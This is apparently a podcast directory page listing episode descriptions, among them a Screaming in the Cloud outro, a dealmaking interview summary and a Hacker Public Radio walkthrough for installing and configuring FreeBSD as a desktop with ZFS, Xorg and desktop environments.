And so, it's been a really nice eight months. It's been wild. Learning AWS culture has been wild. It's a sharp diverging culture from where I've been in the past, but it's also really cool to experience the leadership principles in action. They're not just things we put on a website; they're actually things people talk about every day [laugh]. And so, that journey has been humbling and a great learning opportunity as well.

Corey: If people want to learn more, where's the best place to find you?

Rick: Oh, yeah. Contact me on LinkedIn or Twitter. My Twitter account is @rickyo1138. Let me know if you get the 1138 reference. That's a fun one.

Corey: THX 1138. Who doesn't?

Rick: Yeah, there you go. And it's hidden in almost every single George Lucas movie as well.
You can contact me on any of those social media platforms and I'd be happy to engage with anybody that's interested in optimization, cloud technology, bill, anything like that. Or even not [laugh]. Even anything else, either.

Corey: Thank you so much for being so generous with your time. I really appreciate it.

Rick: My pleasure, Corey. It was wonderful talking to you.

Corey: Rick Ochs, Principal Product Manager at AWS. I'm Cloud Economist Corey Quinn, and this is Screaming in the Cloud. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice, along with an angry comment, rightly pointing out that while AWS is great and all, Azure is far more cost-effective for your workloads because, given their lack of security, it is trivially easy to just run your workloads in someone else's account.

Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.

Announcer: This has been a HumblePod production. Stay humble.

Locked On MLB Prospects
Monday Mailbag! How do the Milwaukee Brewers configure the outfield around Christian Yelich?

Locked On MLB Prospects

Play Episode Listen Later Nov 28, 2022 33:32


On today's show, we're answering your questions! Helmut asks about which outfield prospects get promoted in Milwaukee now that Hunter Renfroe was traded to the Angels, and does Esteury Ruiz finally get to play every day? Matt asks about the Chicago White Sox lineup, and we discuss internal (RF Oscar Colas) and external (Andrew Benintendi? Michael Conforto?) options to upgrade the lineup. Alex asks about how to go about studying prospects, while Don asks about reasonable expectations for a prep draftee and Jake asks about Matt McLain of the Cincinnati Reds and Tyler Black of the Milwaukee Brewers. Find and follow LockedOn MLB Prospects on your favorite podcast platforms: Apple Podcasts: https://podcasts.apple.com/us/podcast/locked-on-mlb-prospects/id1525225214 Spotify: https://open.spotify.com/show/2wzJIf26tGgVbB7rsoKyLD Stitcher: https://www.stitcher.com/show/locked-on-mlb-prospects Follow along with LockedOn MLB Prospects host Lindsay Crosby as we follow 120+ affiliated teams throughout the 2022 season! From prospect call-ups to impactful trades to the ever-evolving battle for minor league living and working conditions, Lindsay is covering it all five days a week. Available exclusively on the Locked On Podcast Network. Follow the show on Twitter @LockedOnFarm and email your Mailbag Monday questions to LockedOnMLBProspects@gmail.com Follow Lindsay for up-to-the-minute details on all things Minor League Baseball: On Twitter: https://twitter.com/CrosbyBaseball Support Us By Supporting Our Sponsors! Built Bar Built Bar is a protein bar that tastes like a candy bar. Go to builtbar.com and use promo code “LOCKEDON15,” and you'll get 15% off your next order. BetOnline BetOnline.net has you covered this season with more props, odds and lines than ever before. BetOnline – Where The Game Starts! SimpliSafe With Fast Protect™️ Technology, exclusively from SimpliSafe, 24/7 monitoring agents capture evidence to accurately verify a threat for faster police response.
There's No Safe Like SimpliSafe. Visit SimpliSafe.com/LockedOnMLB to learn more. Learn more about your ad choices. Visit podcastchoices.com/adchoices

PaperPlayer biorxiv neuroscience
Large-scale signal and noise correlations configure multi-task coding in human brain networks

PaperPlayer biorxiv neuroscience

Play Episode Listen Later Nov 24, 2022


Link to bioRxiv paper: http://biorxiv.org/cgi/content/short/2022.11.23.517699v1?rss=1 Authors: Ito, T., Murray, J. D. Abstract: The brain is a complex system with dynamic network changes. Prior studies in theoretical neuroscience have demonstrated that state-dependent neural correlations can be understood from a neural coding framework. These so-called noise correlations - the trial-to-trial or moment-to-moment co-variability - can be interpreted only if the underlying signal correlation - the similarity of task selectivity between pairs of neural units - is known. While the impact of these correlations on task coding has been widely investigated in local spiking circuits, it remains unclear how this coding framework applies to large-scale brain networks. Here we investigate the relationship between large-scale noise correlations and their underlying signal correlations in a multi-task human fMRI dataset. We found that state-dependent noise correlation changes do not typically align in the same direction as their underlying signal correlation, suggesting that 1) trial-by-trial noise is typically reduced between similarly tuned regions, and 2) stimulus-driven activity does not linearly superimpose atop the network's underlying background activity. Crucially, we discovered that noise correlations that changed in the opposite direction as their signal correlation (i.e., anti-aligned correlations) improved the information coding of these brain regions. In contrast, noise correlation changes that were aligned with their signal correlation did not. These aligned noise correlations were primarily correlation increases, which have been commonly (yet incorrectly) assumed to increase information communication between brain regions in human neuroimaging studies.
These findings illustrate that state-dependent noise correlations contribute to the information coding of functional brain networks, but interpretation of these correlation changes requires knowledge of the underlying signal correlations. Copyrights belong to original authors. Visit the link for more info. Podcast created by Paper Player, LLC

SQL Server Radio
Episode 152 - Synchronizations and Associations

SQL Server Radio

Play Episode Listen Later Nov 6, 2022 35:15


Guy and Eitan start with a discussion in the context of Availability Groups and flow by association into further interesting topics. Relevant links:
Configure read-only routing for an Always On availability group
Clusterless Read-Scale Availability Groups
Azure SQL Database elastic query and sharding overview (preview)
CREATE EXTERNAL TABLE (Transact-SQL)
Serverless SQL pool in Azure Synapse Analytics
Data Virtualization with PolyBase for SQL Server 2022
CREATE EXTERNAL TABLE AS SELECT (Transact-SQL)
SQL Server 2022 Release Candidate 1 is now available
Intelligent Query Processing: degree of parallelism feedback
Don't miss out on attending PASS Data Community Summit 2022

AppleVis Podcast
Quick Tip: How to Configure VoiceOver to Start Automatically when Logging into Your Mac

AppleVis Podcast

Play Episode Listen Later Nov 5, 2022


By default, VoiceOver does not start automatically at the macOS login prompt. In this podcast, Tyler demonstrates how to change this. The steps to do so are as follows:
1. Choose Apple > System Settings, and select Lock Screen in the table.
2. Click Accessibility Options and toggle the “VoiceOver” switch on.
3. Click Done.
If FileVault disk encryption is turned on, which is the default, VoiceOver should start when the Mac boots and prompt for the username, and then prompt for the password if the username is entered correctly. However, if you'd rather not have to manually enter your username or be able to navigate other elements in the window, you must turn FileVault off. To do this, open System Settings, select Privacy & Security in the table, and click “FileVault turn off.”

Hacker Public Radio
HPR3718: Making Ansible playbooks to configure Single Sign On for popular open source applications

Hacker Public Radio

Play Episode Listen Later Nov 2, 2022


This is a recording of a short introduction into my latest project. To help sysadmins everywhere the Onestein organization (an organization specialized in Odoo implementations) invested 4 months of research to create a set of easy to use Ansible playbooks to configure single sign on (SSO) for popular open source applications to enable them to authenticate to a Keycloak server as the central identity provider. These playbooks have been published on https://github.com/onesteinbv/project_single_sign_on. The list of supported applications is currently:
Bitwarden
Jenkins
Gitlab
Keycloak (not SSO, but the identity provider)
Nextcloud
Odoo
Xwiki
Zabbix
All playbooks and servers are for Ubuntu servers and are meant to be used as a starting point. 5 minute YouTube talk at the 2022 Nextcloud conference about this project: https://www.youtube.com/watch?v=pDPKzo8Bi10

Fueling Deals
Episode 196: Two Can Be Better Than One: A&M and Building Boards with Brad Feld & Matt Blumberg

Fueling Deals

Play Episode Listen Later Oct 26, 2022 56:43


When discussing entrepreneurialism and venture capital, sometimes the conversation can be greatly beneficial when it's opened to beyond just two people. On episode 196 of the DealQuest Podcast, Corey does just that – he's opened the conversation to include two successful and talented entrepreneurs, Brad Feld and Matt Blumberg. They discuss the many intricate details of entrepreneurialism, venture capital, starting and running a company, and so much more.

BRAD FELD
Brad Feld got his entrepreneurial start in college when he founded his first company, Feld Technologies. This has afforded Brad over 35 years of entrepreneurial experience, which has been greatly beneficial to his co-founding of the company Techstars. Not only that, but working in tandem with his wife, Amy Batchelor, they run the Anchor Point Foundation. Not only is Brad actively engaged with entrepreneurialism, but he's also written several books on entrepreneurship and venture capital, and began blogging in 2004 on these topics. At present, you can find him on Twitter, sharing his knowledge in the niche corner of “VC Twitter”. “VC Twitter” – aka Venture Capital Twitter – is a community of people who utilize the social media platform's tools and broad communication to discuss venture capital, and come together to exchange education, knowledge, and resources.

MATT BLUMBERG
Like Brad, Matt Blumberg is a long-time, successful entrepreneur, author, and business owner. Unlike Brad, Matt's expertise is being a technology entrepreneur. Brad is also the CEO of Bolster, an on-demand executive talent marketplace, designed to help accelerate companies' growth. They focus on this growth by connecting companies with highly vetted executives for interim, fractional, advisory, project-based, or board roles. Matt's experience spans back over 30 years in marketing, consulting, and venture capital.
He has built, founded or chaired several successful businesses to date, including PathForward.org, Oblong Inc., and Return Path Inc. Matt's success in entrepreneurialism doesn't just stop at his personal achievements in business; his knowledge and skill in business have also been recognized by Business Insider as one of New York's 100 most influential technology leaders, by Crain's as one of New York's Top Entrepreneurs, and by Ernst & Young as an Entrepreneur of the Year finalist.

THE PROGRESSION OF BUSINESS RELATIONSHIPS
Brad has been in the business of entrepreneurialism since the mid-80s, and a lot has changed. When selling his first business, Brad was taken under the wing of two successful dealmakers of their time, who taught him some of the basic tenets of deal-making. Their style of deal-making fell out of favor with the advent of the digital age – wherein things can become quite impersonal – but Brad prefers to keep it a bit “old school”. Simply put, he believes in keeping deal-making a relationship – personal, and beneficial to both parties. Focus on building the relationship and an understanding – AKA a “handshake agreement” – before putting things down on paper. Focus on the things that matter in the context of making a deal, versus all the minutiae that can convolute and distract from making a successful deal. Be simple and straightforward about what you want to achieve in the deal, and what matters most to you. During the infancy of the internet, Matt was on the executive team for a then-small-cap public company, Moviefone. Matt was alongside the CEO and CFO during the dealmaking process of selling Moviefone to AOL. He, too, attests to the importance of focusing on the relationship between professionals throughout the entire deal-making process. Ironically, the sale of Moviefone began over a handshake in a movie theater during the premiere of You've Got Mail.
Matt spent 20 years building the company Return Path Inc., with Brad spending 19 years on the board. Return Path Inc. was sold in 2019; however, a potential deal two years prior almost came to fruition. Matt asserts that the former deal failed, and the 2019 deal was successful, ultimately because he knew the CEO of the eventual buyer, and he did not have a relationship with the earlier bidder. This corroborates the importance of having a growing relationship between dealmakers throughout the deal-making process.

INVESTING FOR ORGANIC GROWTH
Brad began to develop his serial entrepreneurial skills by getting in on the ground floor of new-age seed investments by quickening his pace, and investing in a new company each month, something almost entirely unheard of in the mid-90s at the beginning of the commercial internet, wherein most seed investors played a slow and steady game with their investments. With the birth of the internet age in the mid- to late-90s, new businesses in tech began to spring up like weeds, and Brad took this newly flourishing market to begin making angel investments. He used virtually 100% of the profits he made from selling his first company to make a series of angel investments in the infancy of tech businesses. He also positioned himself to be on the company boards, and in some instances, even co-founded the company. For Brad, his ability to become an angel investor, combined with his strategic positioning within the companies, opened a lot of doors, leading into some of the more well-known VC businesses of today.

ACQUISITION FOR INORGANIC GROWTH
While investing capital into a company to build equity is a good path to build organic growth, another valuable way to build growth, for some, is inorganically: taking a smaller company and acquiring other smaller companies, to the point that the growth becomes a chain link of acquisitions that build a larger company.
I.e., Company A acquires Company B to make Company C, Company C acquires Company D to become Company E, and so on and so forth. The goal of growing a business is to always be additive to what you already have. In the business of inorganic growth, it's important to only seek companies that can add to what you've already built – it won't always work out successfully, but the goal is always to remain in forward momentum. Especially as a buyer, you can't be afraid of making a mistake, making a bad deal, or acquiring a business that ends up not being additive to your core company. Brad's anecdotal evaluation on acquisitions is a half-joke passed to him from his mentor: “Would you buy it for a dollar?” If the answer is yes, then there's something to talk about; investigate the potential. If the answer is no, then perhaps it's best to move on. As Brad says, “When you ask that question, [you find] there's a lot of stuff you wouldn't buy for a dollar.” This rule applies to the acquisitions of companies. Frankly, if you wouldn't spend a dollar on it, why are you entertaining the idea of spending money on it? When Matt was looking for investors for Return Path Inc. around the time of the dot-com bubble and collapse, another small company – that just so happened to have Brad on the executive board – was also at the doorstep of the same investment company. The investment company compared the two businesses, and noted that they were fundamentally the same. The deal then became merging the two like companies into one larger company, with Return Path Inc. becoming the acquirer. While Matt recollects that deal in one way, Brad recalls his view somewhat differently, which revolves back to, and is another testimony of, the importance of building relationships in dealmaking with authenticity.
Depending on your position approaching the deal, and your position within the respective companies, your field of vision on the deal may vary, and good practice is to keep in mind all the potentially differing viewpoints. RISK ASSESSMENT FOR GROWTH Within business there is always a risk curve. You want to post yourself in a comfortable area of this risk curve, especially at the start of any new deal potential. Your deal should be primarily about generating upside, not mitigating risk: Keep your dealmaking to principal players only: when you begin to open the deal up to non-principal players, your risk will increase. Be unafraid to take risks. Be aware of risks, and take inventory of risks, but do not focus entirely on evaluating risk factors. Do not lose sight of the vision of the deal. If you're a principal in a deal process, do not defer to others, nor hide behind your lawyers Try to keep the deal as engaged and collaborative as possible (IE: as the deal initiator, do your best to continue to nurture the relationship throughout the entire process, and if your counterpart is seeming to defer out, check in with them; make sure they're remaining engaged, as well). Do your pre-due diligence. * for more on pre-due diligence, check out Lesson 2: How to Prepare for Deals in the Deal-Driven Growth Accelerator course Understand there are no successful deals without some risk involved THE PATHWAY TO BUILDING A BOARD While Matt has authored, with contributions from Brad, two other books on this subject, Matt and Brad jointly constructed Startup Boards: A Field Guide to Building and Leading an Effective Board of Directors, released in June 2022. Matt asserts that the startup market is oversaturated with new entrepreneurs, most of whom have never started a business, let alone have built an entire board. 
That's the intent of Startup Boards: Focusing on the unassailable fact that competition to get noticed in the startup market is tight, and it takes making the right choices to get noticed by potential investors. Board-building is no easy feat. Many of the things addressed in Startup Boards are designed to make entrepreneurs think about their board and evaluate: Build a board deliberately and with intention. Configure a board that is healthy, and functions as a team. Bring in professionals that don't merely invest in the company, but are proficient in the company's space, and how to direct a company within that space. Be cautious of how many founders are on the board (in most scenarios, the fewer the better, in Matt's opinion). Startup Boards is intended to serve as a field guide for all these entrepreneurs wading the harsh waters of startup and board building, and offer them guidance and a hand up to building their successful company board. They want and expect the reader to dog-ear and reference back to Startup Boards like a map, as the reader journeys through the world of startup and board-building, with hopes of becoming one of the success stories everyone hears about. • • Reach out to Brad Feld for more:https://feld.com/https://onboards.libsyn.com/ Reach out to Matt Blumberg for more:startupceo.comlinkedin.com/in/blumbergmatt • • Corey Kupfer is an expert strategist, negotiator, and dealmaker. He has more than 35 years of professional deal-making and negotiating experience. Corey is a successful entrepreneur, attorney, consultant, author, and professional speaker. He is deeply passionate about deal-driven growth. He is also the creator and host of the DealQuest Podcast. If you want to find out how deal-ready you are, take the Deal-Ready Assessment today!

Hacker Public Radio
HPR3705: The Year of the FreeBSD Desktop

Hacker Public Radio

Oct 14, 2022


Getting an installer

Link to FreeBSD downloads. Choose the correct arch for your system. amd64 is probably the one you want if you know nothing about computer architectures. You will have a lot of options:

  *-bootonly.iso is a netinstall image that is for burning to a CD
  *-disc1.iso is a supplementary CD image for *-bootonly.iso
  *-dvd1.iso is a complete DVD image with extra packages
  *-memstick.img is a complete image for burning to a USB stick
  *-mini-memstick.img is a netinstall image for burning to a USB stick

I typically download and use one of the compressed memstick images. The mini image is fine but you probably want the regular memstick image if this is the first time you've ever installed FreeBSD. It alleviates some of the stress that comes with installing wireless drivers.

To burn a memstick image, use the disk destroyer program:

    root@fbsd# unxz FreeBSD-13.1-RELEASE-amd64-memstick.img.xz
    root@fbsd# sudo dd if=./FreeBSD-13.1-RELEASE-amd64-memstick.img of=/dev/sdx status=progress
    root@fbsd# sudo eject /dev/sdx

Initial installation

Pre-installation

The standard steps for installing Linux apply:

  - disable secure boot
  - enable USB booting
  - select the boot device at startup time

Because this is hardware specific, it's a homework assignment for the audience.

Installation

FreeBSD has a menu driven installer that walks the user through various steps:

1. Set keymap (leave the default if you don't know).

2. Set hostname.

3. Select sets. There are many sets to choose from. New users probably want to install all of them. I typically only install the lib32 set and add the rest later.

4. Partitioning. bsdinstall makes it easy to partition your drives. The Auto (ZFS) option is probably what you want, as the default UFS configuration is unjournaled. In the Auto (ZFS) menu, for a single hard drive installation, you want to stripe one disk. Select your hard drive. If you want full disk encryption, select the Encrypt Disks option. You also want to bump up the swap size to 1.5 times RAM as a general rule (so, for 4g of RAM you set 6g of swap, for 8g of RAM you set 12g of swap). If you selected Encrypt Disks, you should also select Encrypt Swap. When you are done, proceed with the installation. You will get a confirmation message asking if you want to destroy the disk(s) you selected. This is your last chance to go back. If you selected Encrypt Disks, you will be presented with a password prompt. This is the disk encryption password, not any user password.

5. Wait for the sets to install.

6. Configure the root user. After the sets are installed, you will set a root password.

7. Network config. If your wireless card is supported, all the hard parts are already done for you. If your wireless card is not supported, you might need to plug in an ethernet cable and compile the drivers into the kernel. Select your card (em* is ethernet; wifi cards are named after their drivers). If you choose wifi, the installer will scan for networks and give you a menu to select one. If the network is encrypted, you will be presented with a password prompt.

8. Time and date setup.

9. Service setup. You will be presented with a menu that enables/disables services on system startup. You probably want all of them except local_unbound.

10. Security config. The next menu enables/disables security features. If nothing else, select disable_sendmail and clear_tmp.

11. Add users. Simply add your user. You might want to add him to the wheel group if you plan on using sudo. I set my shell to tcsh but you can always change this later.

12. Final configuration. You may want to install the handbook or modify any configurations you've made so far. This will take some time. When you are done, apply the config and exit.

13. Manual config. Before you reboot the system and exit the installer, you are given a last opportunity to make any manual configurations. This is rarely needed for the average desktop user.

Post installation

What, no GUI?
Update system

Log in as root and update the system:

    root@fbsd# freebsd-update fetch
    root@fbsd# freebsd-update install
    root@fbsd# reboot

Installing packages

Before we begin modifying the system, we need a better editor. The pkg utility is used in a nearly identical way to any Linux package manager. The syntax pkg $verb $object persists. Verbs include install, remove, update, upgrade, search, etc. Because the only editors installed by default are vi, ed, and ee, let's install vim. There are multiple vim flavors; I like vim-tiny.

    root@fbsd# pkg bootstrap
    root@fbsd# pkg update
    root@fbsd# pkg search vim
    root@fbsd# pkg install vim-tiny

We probably want sudo (or doas) also:

    root@fbsd# pkg install sudo
    root@fbsd# visudo

Find the line that says:

    # %wheel ALL=(ALL:ALL) ALL

and remove the # from the beginning of the line to enable the wheel group to do actions as root.

Bootloader tweaks

We can tweak the bootloader to make the system more desktop-like. Edit /boot/loader.conf:

    # /boot/loader.conf
    # -----------------
    [ lots of default stuff ]
    # custom stuff
    # boot faster
    autoboot_delay=2

Refer to loader.conf(5) for more tweaks and /boot/defaults/loader.conf for examples.

init tweaks

We can tweak the init system also. Edit /etc/rc.conf:

    # /etc/rc.conf
    # -----------------
    [ lots of default stuff ]
    # enable graphics
    kld_list="i915kms"
    # faster booting
    background_dhclient="YES"

See rc.conf(5) and /etc/defaults/rc.conf for more information on what you can do.

Snapshotting a sane fresh installation

At this point, it is wise to take a recursive snapshot of your FreeBSD installation. This provides us with an easy way to roll back to a fresh, known working system configuration.

    root@fbsd# zfs snapshot -r zroot@freshinstall
    root@fbsd# zfs list -t snapshot

If the system becomes unrepairable, we can simply roll back instead of reinstalling, with a simple command:

    root@fbsd# zfs rollback -r zroot@freshinstall

To roll back every dataset, we can use xargs:

    root@fbsd# zfs list -t snapshot | grep freshinstall | cut -d ' ' -f 1 | xargs -I % zfs rollback %

Using zfs snapshots before and after making any potentially dangerous configuration changes saves a lot of headache in the long run, because zfs is accessible from the recovery shell. Roll back with caution: user data may be lost.

Homework assignment: write a series of cron jobs that automatically take snapshots of user data (and clean up the old ones) as a last line of defense version control.

Graphical user interfaces

Install graphics drivers

This varies depending on your GPU.

    root@fbsd# pkg install drm-kmod

After installing this package, you will see a message on how to enable the driver for your specific hardware:

    For amdgpu: kld_list="amdgpu"
    For Intel: kld_list="i915kms"
    For radeonkms: kld_list="radeonkms"

To enable one of these, you will need to add a line to your /etc/rc.conf. The earlier you place this line in the file, the sooner the kmods will load. For intel graphics, for example, you will add the following line:

    # /etc/rc.conf
    # -----------------
    [ lots of other stuff ]
    # intel graphics drivers
    kld_list="i915kms"

To load the kmod on the fly (for a larger resolution vt), run:

    root@fbsd# kldload i915kms

You will also need to add your non-root user to the video group:

    root@fbsd# pw groupmod video -m $user

Audio

(Hopefully) audio will just work. Supported audio interfaces are enumerated in snd(4), and details on enabling/disabling drivers in /boot/loader.conf are also explained there. To manage volume, use the mixer command. For example, setting the mic volume to 50% and the speaker volume to 95%:

    user@fbsd% mixer mic 50:50
    user@fbsd% mixer vol 95:95

The mixertui command can also be used.
This program functions similarly to alsamixer on Linux. Depending on your hardware, the volume keys on your keyboard might not work. Adding a keybinding to a shell script is the usual solution and should be familiar to anyone who uses a desktop-free window manager.

Getting xorg

    root@fbsd# pkg install xorg

The twm window manager is included with xorg by default. We can use it for testing our xorg configuration, mouse support, etc. before continuing with larger desktop environments. Early troubleshooting always prevents foot shooting. Test early, test often.

    root@fbsd# startx

Desktop Environments

Refer to the handbook's instructions on desktops for instructions on non-suckless (i.e. suckmore) setups. I have tested some of them on FreeBSD. KDE and Xfce are reliable. GNOME is mostly reliable. If you are running a big DE, you might have to modify polkit rules to do things like reboot the system from the GUI. Many larger desktops rely on FreeDesktop.org components. I personally do not like dbus, so instead I use the suckless tools. But, for the sake of completeness, I will install a few for the masses. I installed each one of these independently and sequentially on the same system, using zfs snapshots to roll back to a bare bones system without any DE installed.

GNOME

    root@fbsd# pkg install gnome
    root@fbsd# printf 'proc\t/proc\tprocfs\trw\t0\t0\n' >> /etc/fstab
    root@fbsd# sysrc dbus_enable="YES"
    root@fbsd# sysrc gdm_enable="YES"
    root@fbsd# sysrc gnome_enable="YES"
    root@fbsd# reboot

KDE

    root@fbsd# pkg install kde5 sddm
    root@fbsd# printf 'proc\t/proc\tprocfs\trw\t0\t0\n' >> /etc/fstab
    root@fbsd# sysrc dbus_enable="YES"
    root@fbsd# sysrc sddm_enable="YES"
    root@fbsd# reboot

Xfce

    root@fbsd# pkg install xfce xfce4-goodies
    root@fbsd# sysrc dbus_enable="YES"

Xfce does not provide its own login manager, unlike GNOME or KDE. Let's pick lightdm because it's small and the graphical toolkit matches Xfce.

    root@fbsd# pkg install lightdm-gtk-greeter
    root@fbsd# sysrc lightdm_enable="YES"
    root@fbsd# reboot

Suckless

suckless: tools that suck less. This is how I use FreeBSD (and how I use most computers). I wrote a makefile that modifies the compile options so that the tools will build on FreeBSD and (optionally) adds the theme I use. You can find my suckless duct tape in this git repo. I also use xdm because it's small and fast.

    user@fbsd% sudo pkg install xdm
    user@fbsd% sudo service xdm enable

A final note on desktops

Sometimes desktops behave unexpectedly on FreeBSD (i.e. users cannot manage power settings, reboot the system, etc.). Make sure your login user is in the wheel group (it's your computer, you probably are already in the wheel group) and most of the issues will be resolved. For users you don't want in the wheel group, you'll need to write a few polkit rules. Additionally, big desktops are typically compiled without the graphical components for modifying network connections. Similar to Arch or Gentoo, there is a bit of legwork left to the end user. You'll never know what you might learn about systems administration if you don't wilfully give yourself the opportunity.

Shell tweaks

I like colors in the shell for systems I use regularly. I also like aliases. We can modify our csh configuration file to do the fancy stuff for us automatically.
    # ~/.cshrc
    # -----------------
    [ lots of stuff ]
    # prompt section
    if ($?prompt) then
        # An interactive shell -- set some stuff up
        #set prompt = "%N@%m:%~ %# "
        #set prompt = "%{\033[31m%}%N@%m:%~ %#%{\033[0m%} "
        set prompt = "%{\033[1m%}%N@%m:%~ %#%{\033[0m%} "
        set promptchars = "%#"
        set filec
        set history = 1000
        set savehist = (1000 merge)
        set autolist = ambiguous
        # Use history to aid expansion
        set autoexpand
        set autorehash
        set mail = (/var/mail/$USER)
        if ( $?tcsh ) then
            bindkey "^W" backward-delete-word
            bindkey -k up history-search-backward
            bindkey -k down history-search-forward
            bindkey "^R" i-search-back
        endif
    endif
    # alias section
    alias la ls -aF
    alias lf ls -FA
    alias ll ls -lAF
    alias ls ls -GF
    alias lc ls -GF

Some other packages

The things I like:

    user@fbsd% sudo pkg install firefox gimp feh mpv ffmpeg ImageMagick7 mutt newsboat

If you install a large DE, most of the applications are pulled in as well. If not, you can always use xargs to pull in hundreds of gigabytes of programs:

    user@fbsd% sudo pkg search $desktop | cut -d ' ' -f 1 | xargs sudo pkg install -y

Going GNU:

    user@fbsd% sudo pkg install coreutils emacs bash gcc gmake

Do a few package searches. What you want is probably there. If not, time to start porting :)

Once you have everything configured how you want it, it's a good time to take another zfs snapshot.

Quickstart

Init system

Instead of systemd, FreeBSD uses rc scripts for starting and stopping services. Everything is pretty much shell scripts. To modify the startup process, you simply edit /etc/rc.conf in a text editor. For systemctl-like starting/stopping/enabling, you can do the following:

    root@fbsd# service sshd enable
    root@fbsd# service sshd start
    root@fbsd# service sshd restart
    root@fbsd# service sshd stop
    root@fbsd# service sshd disable
    root@fbsd# service sshd onestart
    root@fbsd# service sshd status

Each service has its own init file, so sometimes a specific service might take different arguments than the standard ones you might expect.

Networking

Network interfaces are configured classically using ifconfig(8). If you want a network interface to persist across reboots, you add the information to /etc/rc.conf. WiFi is managed with wpa_supplicant. Refer to man wpa_supplicant.conf(8) for more information.

Firewall

Use the pf firewall, I like it.

General upgrade process

    root@fbsd# pkg update && pkg upgrade
    root@fbsd# freebsd-update upgrade -r 13.1-RELEASE
    root@fbsd# freebsd-update install
    root@fbsd# reboot
    root@fbsd# freebsd-update install
    root@fbsd# pkg update && pkg upgrade
    root@fbsd# freebsd-update install
    root@fbsd# reboot

Shells

FreeBSD uses tcsh(1) as the default shell and includes sh(1) for Bourne-like compatibility. You can install bash if you want.

Package management

There are two primary ways of managing software: binary packages and ports. Don't mix them if you don't know what you're doing; it can cause problems. To be brief: ports are like Gentoo. You spend a lot of time watching compiler output. The following programs help: synth, portmaster, poudriere. To be verbose, here is a quick guide on using the binary package management system:

    pkg update
    pkg upgrade
    pkg search foobar
    pkg install foobar
    pkg remove foobar
    pkg autoremove

As you can see, the syntax is nearly identical to dnf or apt.

Filesystem

The hierarchy of FreeBSD is slightly different than a typical Linux system. Refer to hier(7) for more information. The biggest difference is that FreeBSD is a logically organized system. On Linux, everything seems to end up in /bin (which is a symlink to /usr/bin). Additionally, /sbin is just a symlink to /usr/sbin. On FreeBSD, the system is more organized. For example: /bin contains everything required to boot the system and /sbin contains everything required for fundamental administration. /usr/bin contains most everything else. /usr/local contains everything installed by the package management system. User-installed programs are configured in /usr/local/etc.
This might be confusing at first but you'll get the hang of it. This logical separation might cause confusion when compiling software from source on FreeBSD, but it's not too difficult to solve if you already know about linker options and makefile modification.

As for filesystems, apparently ext2, ext3, and ext4 have read/write support using the ext2fs(5) driver. I probably wouldn't boot from them but this exists. UFS is not journaled by default; proceed with caution. ZFS is very good.

ZFS non-starter

ZFS is cool because we can create partitions on a whim. Here is some shell output demonstrating listing datasets, creating datasets with a quota, destroying datasets, creating and using encrypted datasets, etc.

    root@freebsd:/ # zfs list
    NAME                                        USED  AVAIL  REFER  MOUNTPOINT
    zroot                                      3.97G   434G    96K  /zroot
    zroot/ROOT                                 3.82G   434G    96K  none
    zroot/ROOT/13.1-RELEASE_2022-09-18_143644     8K   434G  1.07G  /
    zroot/ROOT/default                         3.82G   434G  3.71G  /
    zroot/tmp                                   208K   434G   112K  /tmp
    zroot/usr                                   157M   434G    96K  /usr
    zroot/usr/home                              157M   434G   157M  /usr/home
    zroot/usr/ports                              96K   434G    96K  /usr/ports
    zroot/usr/src                                96K   434G    96K  /usr/src
    zroot/var                                  1.04M   434G    96K  /var
    zroot/var/audit                              96K   434G    96K  /var/audit
    zroot/var/crash                              96K   434G    96K  /var/crash
    zroot/var/log                               424K   434G   300K  /var/log
    zroot/var/mail                              192K   434G   128K  /var/mail
    zroot/var/tmp                               160K   434G    96K  /var/tmp
    root@freebsd:/ # zfs list -t snapshot
    NAME                                                      USED  AVAIL  REFER  MOUNTPOINT
    zroot@freshinstall                                         64K      -    96K  -
    zroot/ROOT@freshinstall                                     0B      -    96K  -
    zroot/ROOT/13.1-RELEASE_2022-09-18_143644@freshinstall      0B      -  1.07G  -
    zroot/ROOT/default@2022-09-18-14:36:44-0                 76.7M      -  1.07G  -
    zroot/ROOT/default@freshinstall                          35.0M      -  1.21G  -
    zroot/tmp@freshinstall                                     96K      -   112K  -
    zroot/usr@freshinstall                                      0B      -    96K  -
    zroot/usr/home@freshinstall                                96K      -   128K  -
    zroot/usr/ports@freshinstall                                0B      -    96K  -
    zroot/usr/src@freshinstall                                  0B      -    96K  -
    zroot/var@freshinstall                                      0B      -    96K  -
    zroot/var/audit@freshinstall                                0B      -    96K  -
    zroot/var/crash@freshinstall                                0B      -    96K  -
    zroot/var/log@freshinstall                                124K      -   188K  -
    zroot/var/mail@freshinstall                                64K      -    96K  -
    zroot/var/tmp@freshinstall                                 64K      -    96K  -
    root@freebsd:/ # zfs create zroot/crypt
    root@freebsd:/ # zfs set quota=5g zroot/crypt
    root@freebsd:/ # zfs list zroot/crypt
    NAME         USED  AVAIL  REFER  MOUNTPOINT
    zroot/crypt   96K  5.00G    96K  /zroot/crypt
    root@freebsd:/ # zfs destroy zroot/crypt
    root@freebsd:/ # zfs create -o encryption=on -o keylocation=prompt -o keyformat=passphrase zroot/crypt
    Enter new passphrase:
    Re-enter new passphrase:
    root@freebsd:/ # zfs list zroot/crypt
    NAME         USED  AVAIL  REFER  MOUNTPOINT
    zroot/crypt  200K   434G   200K  /zroot/crypt
    root@freebsd:/ # touch /zroot/crypt/supersecret
    root@freebsd:/ # ls /zroot/crypt/
    supersecret
    root@freebsd:/ # zfs get encryption zroot/crypt
    NAME         PROPERTY    VALUE        SOURCE
    zroot/crypt  encryption  aes-256-gcm  -
    root@freebsd:/ # zfs unmount zroot/crypt
    root@freebsd:/ # zfs unload-key -r zroot/crypt
    1 / 1 key(s) successfully unloaded
    root@freebsd:/ # zfs mount zroot/crypt
    cannot mount 'zroot/crypt': encryption key not loaded
    root@freebsd:/ # zfs get keystats zroot/crypt
    root@freebsd:/ # zfs get keystatus zroot/crypt
    NAME         PROPERTY   VALUE        SOURCE
    zroot/crypt  keystatus  unavailable  -
    root@freebsd:/ # zfs load-key -r zroot/crypt
    Enter passphrase for 'zroot/crypt': zfs
    1 / 1 key(s) successfully loaded
    root@freebsd:/ # zfs mount -a
    root@freebsd:/ # ls /zroot/crypt/
    supersecret

A conclusion

Really, I think FreeBSD is a viable desktop operating system for the types of people who already use Linux in a terminal-centric capacity. After all, UNIX is UNIX.

Other stuff

